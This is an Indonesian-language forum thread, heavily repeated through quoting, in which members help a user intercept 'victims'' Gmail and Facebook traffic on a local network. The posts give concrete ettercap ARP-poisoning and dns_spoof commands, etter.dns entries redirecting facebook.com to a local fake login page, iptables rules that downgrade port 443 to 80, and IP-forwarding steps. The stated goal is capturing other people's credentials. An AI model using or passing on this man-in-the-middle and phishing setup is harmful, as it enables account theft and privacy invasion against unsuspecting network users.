[Alsad91]

permisi kawan..., maff kalo ane buka Thread baru, cz ane muter2 cari lum ketemu juga jawabannya..
Ane sedang belajar sniffing nih.., pengen coba sniffing Https, uda bebeapa script yg ane gunain, tapi hasilnya gni:
setiap ane jalanin script, selang beberapa saat para korban ndak bisa akses sperti gmail, facebook, selalu muncul----------->>> " This conection is UNTRUSTED "
kalo para korban ndak bisa akses gmail ato facebook, gmana kita mo dapat hasil sniffingnya ya?? :-D
mohon sangat bagi kawan2 yang tahu solusinya, tolong di share di mari ya....
Thanks To this forum N All member

[zee eichel]

kenapa tidak di kombinasi dengan dns_spoof plugin .. arahkan Appendix Ip facebook ke arah http jgn https ?

[Alsad91]

kenapa tidak di kombinasi dengan dns_spoof plugin .. arahkan Appendix Ip facebook ke arah http jgn https ?

maaf bang.., aq kurang tahu yang abang maksut.., boleh lebih detail maksutnyabang?, atomungkin ada link diskusinya bang??, tadi aq coba searcing tentang dns spoof kok gak mudeng :-D

[zee eichel]

ettercap memiliki plugin untuk spoof address .. logikanya gini om

ASK|
T : kenapa sampe keluar peringatan browser untrusted connection ?
J : Karena browser mengarah kepada https ( ssl secure connection ) dan tiap browser memang ada kemampuan untuk membaca sertifikat validasi dari ssl dan ditemukan itu tidak valid atau dalam keadaan di snif

T: Gimana dong caranya agar hal itu tidak keluar ?
J: Dengan cara kita harus bisa mengarahkan ip facebook ke dns http jgn https

T: Caranya ?
J: dengan cara memanipulasi paket request domain

T: Wah ribet lagi dong ?
J: ya gk lah kan kita tinggal aktifkan dns_spoof ( klo ente pake ettercap )

T: Terus caranya ?
J: cari dulu dimana etter.dns, script yang wajib kita edit pake locate
locate etter.dns

root@dracos:~# locate etter.dns
/usr/share/ettercap/etter.dns

kebetulan ane pake dracos hehehe nah klo sudah edit saja pake editor kesayangan

root@dracos:~# geany etter.dns

erus liat di baris

microsoft.com terus robah ketiga baris jadi kek gini

facebook.com A 192.168.1.11 ----------------------> ip local yooo
*.facebook.com A 192.168.1.11
www.facebook.com PTR 192.168.1.11 # Wildcards in PTR are not allowed

siapkan fake login namun yg sudah bisa redirect ke situs asli yoo

cara 2 :
harap di edit di etter.conf

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hmm cek disitu

%iface mending ente ganti ke interface aktif
%port = 443 ( atau apalah ssl port )
%rport = 80

Perlu ente tau bahwa ssl port itu ada di 443 ..

hal ini bisa dilakukan jika

ip_forward = 1

semoga membantu

[Alsad91]

ettercap memiliki plugin untuk spoof address .. logikanya gini om

ASK|
T : kenapa sampe keluar peringatan browser untrusted connection ?
J : Karena browser mengarah kepada https ( ssl secure connection ) dan tiap browser memang ada kemampuan untuk membaca sertifikat validasi dari ssl dan ditemukan itu tidak valid atau dalam keadaan di snif

T: Gimana dong caranya agar hal itu tidak keluar ?
J: Dengan cara kita harus bisa mengarahkan ip facebook ke dns http jgn https

T: Caranya ?
J: dengan cara memanipulasi paket request domain

T: Wah ribet lagi dong ?
J: ya gk lah kan kita tinggal aktifkan dns_spoof ( klo ente pake ettercap )

T: Terus caranya ?
J: cari dulu dimana etter.dns, script yang wajib kita edit pake locate
locate etter.dns

root@dracos:~# locate etter.dns
/usr/share/ettercap/etter.dns

kebetulan ane pake dracos hehehe nah klo sudah edit saja pake editor kesayangan

root@dracos:~# geany etter.dns

erus liat di baris

microsoft.com terus robah ketiga baris jadi kek gini

facebook.com A 192.168.1.11 ----------------------> ip local yooo
*.facebook.com A 192.168.1.11
www.facebook.com PTR 192.168.1.11 # Wildcards in PTR are not allowed

siapkan fake login namun yg sudah bisa redirect ke situs asli yoo

cara 2 :
harap di edit di etter.conf

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hmm cek disitu

%iface mending ente ganti ke interface aktif
%port = 443 ( atau apalah ssl port )
%rport = 80

Perlu ente tau bahwa ssl port itu ada di 443 ..

hal ini bisa dilakukan jika

ip_forward = 1

semoga membantu

wahhhhh......, sangat membantu sekali ohm...........,
mudah2anh Tuhan membalas kebaikannya ohm.... ( cs ane mo bales share ilmu kagak bisa, cs masih O'ON )wakakakkakakakaka :-D
Thanks Ya Ohm...

---

aq coba dulu ya bang.....

---

permisi bang..., ane edit dan uda ane coba, hasilnya kek gini bang...

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# ettercap -T -q -i -P dns_spoof -M ARP // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


TARGET (dns_spoof) contains invalid chars !

Adakah yang salah bang??
Thanks bang..

[alkaaf]

ettercap memiliki plugin untuk spoof address .. logikanya gini om

ASK|
T : kenapa sampe keluar peringatan browser untrusted connection ?
J : Karena browser mengarah kepada https ( ssl secure connection ) dan tiap browser memang ada kemampuan untuk membaca sertifikat validasi dari ssl dan ditemukan itu tidak valid atau dalam keadaan di snif

T: Gimana dong caranya agar hal itu tidak keluar ?
J: Dengan cara kita harus bisa mengarahkan ip facebook ke dns http jgn https

T: Caranya ?
J: dengan cara memanipulasi paket request domain

T: Wah ribet lagi dong ?
J: ya gk lah kan kita tinggal aktifkan dns_spoof ( klo ente pake ettercap )

T: Terus caranya ?
J: cari dulu dimana etter.dns, script yang wajib kita edit pake locate
locate etter.dns

root@dracos:~# locate etter.dns
/usr/share/ettercap/etter.dns

kebetulan ane pake dracos hehehe nah klo sudah edit saja pake editor kesayangan

root@dracos:~# geany etter.dns

erus liat di baris

microsoft.com terus robah ketiga baris jadi kek gini

facebook.com A 192.168.1.11 ----------------------> ip local yooo
*.facebook.com A 192.168.1.11
www.facebook.com PTR 192.168.1.11 # Wildcards in PTR are not allowed

siapkan fake login namun yg sudah bisa redirect ke situs asli yoo

cara 2 :
harap di edit di etter.conf

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hmm cek disitu

%iface mending ente ganti ke interface aktif
%port = 443 ( atau apalah ssl port )
%rport = 80

Perlu ente tau bahwa ssl port itu ada di 443 ..

hal ini bisa dilakukan jika

ip_forward = 1

semoga membantu

wahhhhh......, sangat membantu sekali ohm...........,
mudah2anh Tuhan membalas kebaikannya ohm.... ( cs ane mo bales share ilmu kagak bisa, cs masih O'ON )wakakakkakakakaka :-D
Thanks Ya Ohm...

---

aq coba dulu ya bang.....

---

permisi bang..., ane edit dan uda ane coba, hasilnya kek gini bang...

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# ettercap -T -q -i -P dns_spoof -M ARP // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


TARGET (dns_spoof) contains invalid chars !

Adakah yang salah bang??
Thanks bang..

bisa di tulis file etter.dns nya?

[zee eichel]

tinggal om cek sendiri .. om jga pasti punya kok

/usr/share/ettercap/etter.dns

[Udalah$]

ettercap memiliki plugin untuk spoof address .. logikanya gini om

ASK|
T : kenapa sampe keluar peringatan browser untrusted connection ?
J : Karena browser mengarah kepada https ( ssl secure connection ) dan tiap browser memang ada kemampuan untuk membaca sertifikat validasi dari ssl dan ditemukan itu tidak valid atau dalam keadaan di snif

T: Gimana dong caranya agar hal itu tidak keluar ?
J: Dengan cara kita harus bisa mengarahkan ip facebook ke dns http jgn https

T: Caranya ?
J: dengan cara memanipulasi paket request domain

T: Wah ribet lagi dong ?
J: ya gk lah kan kita tinggal aktifkan dns_spoof ( klo ente pake ettercap )

T: Terus caranya ?
J: cari dulu dimana etter.dns, script yang wajib kita edit pake locate
locate etter.dns

root@dracos:~# locate etter.dns
/usr/share/ettercap/etter.dns

kebetulan ane pake dracos hehehe nah klo sudah edit saja pake editor kesayangan

root@dracos:~# geany etter.dns

erus liat di baris

microsoft.com terus robah ketiga baris jadi kek gini

facebook.com A 192.168.1.11 ----------------------> ip local yooo
*.facebook.com A 192.168.1.11
www.facebook.com PTR 192.168.1.11 # Wildcards in PTR are not allowed

siapkan fake login namun yg sudah bisa redirect ke situs asli yoo

cara 2 :
harap di edit di etter.conf

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hmm cek disitu

%iface mending ente ganti ke interface aktif
%port = 443 ( atau apalah ssl port )
%rport = 80

Perlu ente tau bahwa ssl port itu ada di 443 ..

hal ini bisa dilakukan jika

ip_forward = 1

semoga membantu

wahhhhh......, sangat membantu sekali ohm...........,
mudah2anh Tuhan membalas kebaikannya ohm.... ( cs ane mo bales share ilmu kagak bisa, cs masih O'ON )wakakakkakakakaka :-D
Thanks Ya Ohm...

---

aq coba dulu ya bang.....

---

permisi bang..., ane edit dan uda ane coba, hasilnya kek gini bang...

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# ettercap -T -q -i -P dns_spoof -M ARP // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


TARGET (dns_spoof) contains invalid chars !

Adakah yang salah bang??
Thanks bang..

coba cek lagi settingan etter.dns, mungkin ada yg kurang

[zee eichel]

ettercap memiliki plugin untuk spoof address .. logikanya gini om

ASK|
T : kenapa sampe keluar peringatan browser untrusted connection ?
J : Karena browser mengarah kepada https ( ssl secure connection ) dan tiap browser memang ada kemampuan untuk membaca sertifikat validasi dari ssl dan ditemukan itu tidak valid atau dalam keadaan di snif

T: Gimana dong caranya agar hal itu tidak keluar ?
J: Dengan cara kita harus bisa mengarahkan ip facebook ke dns http jgn https

T: Caranya ?
J: dengan cara memanipulasi paket request domain

T: Wah ribet lagi dong ?
J: ya gk lah kan kita tinggal aktifkan dns_spoof ( klo ente pake ettercap )

T: Terus caranya ?
J: cari dulu dimana etter.dns, script yang wajib kita edit pake locate
locate etter.dns

root@dracos:~# locate etter.dns
/usr/share/ettercap/etter.dns

kebetulan ane pake dracos hehehe nah klo sudah edit saja pake editor kesayangan

root@dracos:~# geany etter.dns

erus liat di baris

microsoft.com terus robah ketiga baris jadi kek gini

facebook.com A 192.168.1.11 ----------------------> ip local yooo
*.facebook.com A 192.168.1.11
www.facebook.com PTR 192.168.1.11 # Wildcards in PTR are not allowed

siapkan fake login namun yg sudah bisa redirect ke situs asli yoo

cara 2 :
harap di edit di etter.conf

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hmm cek disitu

%iface mending ente ganti ke interface aktif
%port = 443 ( atau apalah ssl port )
%rport = 80

Perlu ente tau bahwa ssl port itu ada di 443 ..

hal ini bisa dilakukan jika

ip_forward = 1

semoga membantu

wahhhhh......, sangat membantu sekali ohm...........,
mudah2anh Tuhan membalas kebaikannya ohm.... ( cs ane mo bales share ilmu kagak bisa, cs masih O'ON )wakakakkakakakaka :-D
Thanks Ya Ohm...

---

aq coba dulu ya bang.....

---

permisi bang..., ane edit dan uda ane coba, hasilnya kek gini bang...

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# ettercap -T -q -i -P dns_spoof -M ARP // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


TARGET (dns_spoof) contains invalid chars !

Adakah yang salah bang??
Thanks bang..

paste di sini editan file etter.dns nya

[alkaaf]

tinggal om cek sendiri .. om jga pasti punya kok

/usr/share/ettercap/etter.dns

hehe mksdx ts yg suruh tls etter.dns nya byr bs koreksi